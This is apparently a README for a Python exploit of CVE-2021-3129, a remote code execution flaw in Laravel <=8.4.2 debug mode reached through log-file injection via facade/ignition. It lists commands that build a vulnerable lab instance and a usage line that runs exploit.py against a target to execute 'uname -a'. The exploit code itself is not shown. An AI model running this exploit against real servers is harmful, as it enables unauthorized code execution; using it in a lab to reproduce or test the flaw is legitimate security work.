
Exploit en Python para Laravel <=8.4.2 en modo debug con ejecución remota de código (CVE-2021-3129) mediante inyección de archivos de registro manipulados vía facade/ignition.
git clone https://github.com/laravel/laravel.git
cd laravel
git checkout e849812
composer install
composer require facade/ignition==2.5.1
php artisan serve
python3 exploit.py http://pwnme.me:8000 /var/www/html/laravel/storage/logs/laravel.log 'uname -a'
